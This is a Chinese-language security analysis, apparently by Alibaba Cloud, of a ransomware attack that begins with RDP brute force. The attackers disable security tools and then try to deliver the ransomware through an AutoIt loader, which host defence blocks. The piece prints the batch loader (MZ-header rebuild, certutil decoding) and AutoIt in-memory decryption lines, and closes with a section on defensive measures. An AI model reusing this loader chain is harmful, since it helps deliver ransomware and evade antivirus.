黑客首先通過RDP暴力破解登陸客戶機器,獲取機器的控制權(quán)限���。
云安全中心監(jiān)控到兩個位于拉脫維亞里加的IP:188.92.77.15和188.92.79.123 成功登陸主機��。
登陸成功后���,黑客遠程拷貝Killer.bat惡意腳本到主機并執(zhí)行,該腳本主要功能是關(guān)閉安全軟件�����、系統(tǒng)服務等����。
黑客開始第一次勒索攻擊,植入文件名為SOS.exe的勒索病毒��,運行之后被云安全中心主機防御成功攔截����。
黑客發(fā)現(xiàn)對抗之后����,開始使用load加載的免殺繞過方式����,植入a.exe,這是一個使用7zip打包后的自解壓exe程序����,將其解壓之后,釋放了4個文件:cnbbrnrhi.com�����、kiwvyrcee.com��、lozgzxher.com����、qnsdpztxh.com。
其中kiwvyrcee.com是一個批處理文件:
Set byoraiood=Q
ping -n 1 wnmosszxn
<nul set /p ="MZ" > rundll32.com
type cnbbrnrhi.com >> rundll32.com
del cnbbrnrhi.com
certutil -decode lozgzxher.com Q
start /w rundll32.com Q
ping 127.0.0.1 -n 6
cnbbrnrhi.com添加"MZ"之后生成了rundll32.com�����,它其實是AutoIt.exe,是一個自動化的Windows界面交互的腳本語言解釋器�����,由于本身屬于合法程序���,黑客可以把惡意代碼藏在腳本文件中,從而靈活地執(zhí)行惡意操作���。
lozgzxher.com是一個開源的AutoIt解密腳本�,將混淆加密后的勒索病毒qnsdpztxh.com加載到內(nèi)存中解密執(zhí)行�����。其代碼執(zhí)行流如下:
$in = FileOpen("qnsdpztxh.com", BitRotate(2147483648, -$GNWWRZY, "D"))
$FileData = FileRead($in)
$UncryptedData = _Crypt_DecryptData($FileData, $CryptedKey, 0)
qnsdpztxh.com解密后�,發(fā)現(xiàn)其md5和SOS.exe勒索病毒一致,因此判斷黑客嘗試通過AutoIt腳本來投遞二進制勒索病毒母體�����,還是未能繞過云安全中心主機防御�����。
勒索病毒準備關(guān)閉數(shù)據(jù)庫等服務,被主機防御成功攔截:
勒索病毒準備加密磁盤文件�����,被主機防御成功攔截:
應對措施
勒索病毒對企業(yè)來說是危害極大的安全風險之一���,一旦核心數(shù)據(jù)或文件被加密���,除了繳納贖金,基本上無法解密��。阿里云云安全中心(主機防御)已經(jīng)實現(xiàn)逐層遞進的縱深式防御:
首先借助云上全方位的威脅情報�����,云安全中心實現(xiàn)了對大量已知勒索病毒的實時防御��,在企業(yè)主機資源被病毒感染的第一時間進行攔截�����,避免發(fā)生文件被病毒加密而進行勒索的情況�����;
其次,通過放置誘餌的方式���,云安全中心實時捕捉可能的勒索病毒行為����,尤其針對新型未知的勒索病毒����,一旦識別到有異常加密行為發(fā)生,會立刻攔截同時通知用戶進行排查�����,進行清理�;
最后���,在做好對勒索病毒防御的情況下�,云安全中心還支持文件備份服務�,能定期對指定文件進行備份,支持按時間按文件版本恢復���,在極端情況發(fā)生而導致文件被加密時���,能夠通過文件恢復的方式找回��,做到萬無一失�。
經(jīng)營性網(wǎng)站備案信息
可信網(wǎng)站信用評價
網(wǎng)絡警察提醒您
誠信網(wǎng)站
中國互聯(lián)網(wǎng)舉報中心
網(wǎng)絡舉報APP下載
